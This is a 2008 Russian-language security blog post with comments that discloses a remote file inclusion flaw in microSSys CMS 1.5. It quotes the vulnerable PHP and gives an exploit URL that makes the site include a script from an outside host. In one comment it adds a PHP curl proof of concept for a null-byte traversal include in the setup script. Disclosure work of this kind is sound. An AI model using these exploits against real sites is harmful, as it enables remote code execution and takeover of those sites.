Инклуд удаленных файлов в microSSys CMS 1.5

19 May 2008, 17:34VulnerabilitiesRaz0r8 comments
, , ,

Обнаружил RFI в microSSys CMS, самой непрофессиональной CMS’ке, которую я когда-либо видел. Помнится был WCPS, который занимал в моем “почетном” рейтинге первое место, но эта CMS еще ужасней во всех отношениях, включая и безопасность. Вот хоронология моих действий:

  1. переписал файлы на локалхост
  2. открыл в браузере скрипт установки
  3. испугался и закрыл
  4. открыл исходный код index.php
  5. снова испугался, но перед тем, как закрыть заметил RFI

CMS’ка настолько стремная, что str0ke с milw0rm’а отказался принимать уязвимость =)
Собственно вот advisory:


## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability ## Software site: http://wajox.com/ ## =============================================================== ## By Raz0r (www.Raz0r.name) ## =============================================================== ## Vulnerable code (index.php@22-25,54-55): ## [22] if(isset($_REQUEST["1"])){ ## [23] $P=$_REQUEST["1"];}else{ ## [24] $P="main"; ## [25] } ## [..] ## [54] if(isset($PAGES[$P])){}else{include("TH.txt");} ## [55] @include($PAGES[$P]); ## Nice... ## =============================================================== ## Exploit: ## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php ## ===============================================================
Думаю в комментариях не нуждается =) Единственное, что можно отметить – для реализации необходим включенный register_globals, иначе мы не сможем добавить в массив PAGES наш элемент.


8 comments:

  1. c0nst, 19. May 2008, 21:00

    неужели скрипты с такими ошибками еще существуют 😀

     
  2. Raz0r, 20. May 2008, 15:09

    еще как существуют!
    Кстати, str0ke все-таки запостил =) Обычно он публикует сплоиты на следующий день, но в этот раз почему-то через два. Не получив от него ответа, я подумал, что он отказался =)

     
  3. Kuzya, 31. May 2008, 21:54

    http://milw0rm.com/exploits/5651
    =)

     
  4. B!TCR@$H, 2. June 2008, 10:59

    2Raz0r
    http://www.wajox.com/products/cms.tar.gz

     
  5. Raz0r, 2. June 2008, 22:07

    Насколько я понял вы разработчик microSSys CMS. Изменения в новой версии налицо, но работать над ней нужно еще очень много. Когда полностью завершите работу, тогда и выкладывайте мне ссылки, а пока что-то оценивать еще рано. В подтверждение моим словам еще один инклуд:

    <?php
$url = 'http://localhost/ssys/setup/setmod.php';

$data = 'count=1&module_1=/../index.php%00';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 10);
curl_setopt($ch, CURLOPT_PORT, 80);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$resp = curl_exec($ch);
curl_close($ch);

echo "<pre>";
print_r($resp);
echo "</pre>";
?>
     
  6. B!TCR@$H, 3. June 2008, 11:31

    Это установочный скрипт и там защиты мы не делаем вообще).Потому как она там просто не нужна).Ведь доступ к этим файлам будет иметь только владелец и после установки они будут удалены да и альфа версия это.
    Как закончим обязательно дадим Вам ссылку.

     
  7. B!TCR@$H, 3. June 2008, 11:33

    И ещё,переписывать мы его(движок) стали до того как была найдена и опубликована эта уязвимость:-).

     
  8. Raz0r, 3. June 2008, 14:36

    >Это установочный скрипт и там защиты мы не делаем вообще
    о какой безопасности может идти речь, когда даже в скриптах установки нет никакой защиты. Представьте, что пользователь забыл или не захотел удалять скрипт установки, что тогда? Можно не только реализовать инклуд, но и заново установить CMS, т.е. все данные в БД будут потеряны. Более того, после установки CMS не предупреждает пользователя о том, что ему следует удалить ненужные скрипты. Я уверен, что неопытный пользователь оставит все как есть.
    P.S. жду stable-версию

     

Write a comment: